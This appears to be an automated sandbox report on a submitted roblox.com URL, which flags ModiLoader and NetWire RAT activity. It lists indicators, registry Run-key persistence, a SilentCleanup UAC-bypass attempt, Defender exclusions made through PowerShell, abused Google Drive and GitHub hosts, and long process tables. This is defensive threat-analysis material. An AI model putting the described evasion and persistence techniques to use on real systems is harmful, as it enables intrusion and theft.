modiloader | hxxp://roblox[.]com

Analysis

max time kernel
438s
max time network
432s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
17/09/2024, 22:06

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

http://roblox.com

Score

10^/10

modiloader netwire botnet steam defense_evasion discovery execution macro macro_on_action motw persistence phishing privilege_escalation stealer trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Netwire
Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.
botnet stealer netwire

ModiLoader First Stage 1 IoCs

resource	yara_rule
behavioral1/files/0x000d0000000237e3-2577.dat	modiloader_stage1

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
9560	powershell.exe

Downloads MZ/PE file

Office macro that triggers on suspicious action 1 IoCs

Office document macro which triggers in special circumstances - often malicious.

macro macro_on_action

resource	yara_rule
behavioral1/files/0x00070000000237f6-7253.dat	office_macro_on_action

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	FreeYoutubeDownloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	FreeYoutubeDownloader.exe

Executes dropped EXE 14 IoCs

pid	Process
1652	NetWire.exe
5056	NetWire.exe
7704	NetWire.exe
7748	NetWire.exe
9524	NetWire.exe
7560	NetWire.exe
9320	NetWire.exe
7740	NetWire.exe
4512	fodhelper.exe
7832	FreeYoutubeDownloader.exe
2252	Free YouTube Downloader.exe
7128	FreeYoutubeDownloader.exe
7636	Free YouTube Downloader.exe
4620	Free YouTube Downloader.exe

Loads dropped DLL 10 IoCs

pid	Process
9572	NetWire.exe
8232	NetWire.exe
4512	fodhelper.exe
8240	MsiExec.exe
8240	MsiExec.exe
8240	MsiExec.exe
8240	MsiExec.exe
8240	MsiExec.exe
8240	MsiExec.exe
8240	MsiExec.exe

Abuse Elevation Control Mechanism: Bypass User Account Control 1 TTPs 1 IoCs

UAC Bypass Attempt via SilentCleanup Task.

defense_evasion privilege_escalation

Bypass User Account Control

T1548.002

pid	Process
9428	schtasks.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Qspt = "C:\\Users\\Admin\\AppData\\Local\\Qspt\\Qspt.hta"	NetWire.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Free Youtube Downloader = "C:\\Windows\\Free Youtube Downloader\\Free Youtube Downloader\\Free YouTube Downloader.exe"	FreeYoutubeDownloader.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Free Youtube Downloader = "C:\\Windows\\Free Youtube Downloader\\Free Youtube Downloader\\Free YouTube Downloader.exe"	FreeYoutubeDownloader.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
754	raw.githubusercontent.com
757	drive.google.com
758	drive.google.com
761	drive.google.com
763	drive.google.com
767	drive.google.com
769	drive.google.com
167	raw.githubusercontent.com

Mark of the Web detected: This indicates that the page was originally saved or cloned. 1 IoCs

phishing motw

flow	ioc
347	https://storage.googleapis.com/script.aniview.com/ssync/62f53b2c7850d0786f227f64/ssync.html

Detected potential entity reuse from brand steam.
phishing steam

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 9572 set thread context of 9912	9572	NetWire.exe	233
PID 8232 set thread context of 9020	8232	NetWire.exe	234
PID 7740 set thread context of 6952	7740	NetWire.exe	237

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Crashpad\metadata	setup.exe
File opened for modification	C:\Program Files\Crashpad\settings.dat	setup.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe	FreeYoutubeDownloader.exe
File opened for modification	C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.exe	FreeYoutubeDownloader.exe
File opened for modification	C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.ini	FreeYoutubeDownloader.exe
File opened for modification	C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe	FreeYoutubeDownloader.exe
File opened for modification	C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe	FreeYoutubeDownloader.exe
File opened for modification	C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.exe	FreeYoutubeDownloader.exe
File created	C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.ini	FreeYoutubeDownloader.exe
File opened for modification	C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe	FreeYoutubeDownloader.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Notepad.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FreeYoutubeDownloader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FreeYoutubeDownloader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133710843794550575"	chrome.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2718105630-359604950-2820636825-1000\{63F886F5-6F3C-49DD-8917-98503F304361}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings	msedge.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
8172	reg.exe
7848	reg.exe
7792	reg.exe

NTFS ADS 6 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 717079.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 314583.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 151303.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 12130.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 72519.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 307631.crdownload:SmartScreen	msedge.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
6192	NOTEPAD.EXE

Script User-Agent 10 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	769	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	763	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	760	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	761	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	762	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	764	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	767	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	768	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	770	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	758	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 37 IoCs

pid	Process
2220	msedge.exe
2220	msedge.exe
4924	msedge.exe
4924	msedge.exe
4844	chrome.exe
4844	chrome.exe
1816	msedge.exe
1816	msedge.exe
1584	msedge.exe
1584	msedge.exe
5040	identity_helper.exe
5040	identity_helper.exe
4560	msedge.exe
4560	msedge.exe
5440	msedge.exe
5440	msedge.exe
5440	msedge.exe
5440	msedge.exe
3508	msedge.exe
3508	msedge.exe
3912	msedge.exe
3912	msedge.exe
5484	msedge.exe
5484	msedge.exe
9748	msedge.exe
9748	msedge.exe
9560	powershell.exe
9560	powershell.exe
9560	powershell.exe
6648	msedge.exe
6648	msedge.exe
6868	msedge.exe
6868	msedge.exe
10120	msedge.exe
10120	msedge.exe
8592	msedge.exe
8592	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1584	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe
Token: SeShutdownPrivilege	4844	chrome.exe
Token: SeCreatePagefilePrivilege	4844	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
4844	chrome.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1584	msedge.exe
1584	msedge.exe
7832	FreeYoutubeDownloader.exe
7128	FreeYoutubeDownloader.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4924 wrote to memory of 1628	4924	msedge.exe	85
PID 4924 wrote to memory of 1628	4924	msedge.exe	85
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 1300	4924	msedge.exe	86
PID 4924 wrote to memory of 2220	4924	msedge.exe	87
PID 4924 wrote to memory of 2220	4924	msedge.exe	87
PID 4924 wrote to memory of 3364	4924	msedge.exe	88
PID 4924 wrote to memory of 3364	4924	msedge.exe	88
PID 4924 wrote to memory of 3364	4924	msedge.exe	88
PID 4924 wrote to memory of 3364	4924	msedge.exe	88
PID 4924 wrote to memory of 3364	4924	msedge.exe	88
PID 4924 wrote to memory of 3364	4924	msedge.exe	88
PID 4924 wrote to memory of 3364	4924	msedge.exe	88
PID 4924 wrote to memory of 3364	4924	msedge.exe	88
PID 4924 wrote to memory of 3364	4924	msedge.exe	88
PID 4924 wrote to memory of 3364	4924	msedge.exe	88
PID 4924 wrote to memory of 3364	4924	msedge.exe	88
PID 4924 wrote to memory of 3364	4924	msedge.exe	88
PID 4924 wrote to memory of 3364	4924	msedge.exe	88
PID 4924 wrote to memory of 3364	4924	msedge.exe	88
PID 4924 wrote to memory of 3364	4924	msedge.exe	88
PID 4924 wrote to memory of 3364	4924	msedge.exe	88
PID 4924 wrote to memory of 3364	4924	msedge.exe	88
PID 4924 wrote to memory of 3364	4924	msedge.exe	88
PID 4924 wrote to memory of 3364	4924	msedge.exe	88
PID 4924 wrote to memory of 3364	4924	msedge.exe	88

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://roblox.com
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe5fbc46f8,0x7ffe5fbc4708,0x7ffe5fbc4718
  2⤵
  PID:1628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,10306820945554620101,4473241969707980104,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
  2⤵
  PID:1300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,10306820945554620101,4473241969707980104,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,10306820945554620101,4473241969707980104,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8
  2⤵
  PID:3364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
